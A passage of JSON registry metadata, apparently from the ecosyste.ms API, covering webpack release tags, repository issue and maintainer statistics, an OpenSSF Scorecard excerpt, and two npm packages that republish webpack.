pack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T13:44:24.432Z","dependent_packages_count":3,"downloads":20,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":18.329460441159455,"dependent_repos_count":10.295976646711454,"dependent_packages_count":5.888476794839281,"stargazers_count":0.07781277205059343,"forks_count":0.39273321703433056,"docker_downloads_count":null,"average":6.996891974359023},"purl":"pkg:npm/my-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/my-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/my-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/my-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/my-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/my-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/my-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/my-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/my-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/my-webpack/codemeta","maintainers":[{"uuid":"yuxiu","login":"yuxiu","name":null,"email":"tanchengyl@126.com","url":null,"packages_count":9,"html_url":"https://www.npmjs.com/~yuxiu","role":null,"created_at":"2022-11-10T18:22:00.170Z","updated_at":"2022-11-10T18:22:00.170Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/yuxiu/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1044297,"name":"@maialesatanico/webpack","ecosystem":"npm","description":"THIS PACKAGE IS A COPY OF WEBPACK: THE ONLY DIFFERENCE IS IN THE VERSION OF THE DEPENDENCIE \"node-libs-browser\" - Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loade","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"maialesatanico","versions_count":1,"first_release_published_at":"2016-04-13T13:27:01.570Z","latest_release_published_at":"2016-04-13T13:27:01.570Z","latest_release_number":"1.12.15","last_synced_at":"2026-09-03T02:21:36.550Z","created_at":"2022-04-07T20:03:09.341Z","updated_at":"2026-09-03T02:21:36.550Z","registry_url":"https://www.npmjs.com/package/@maialesatanico/webpack","install_command":"npm install @maialesatanico/webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.12.15"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 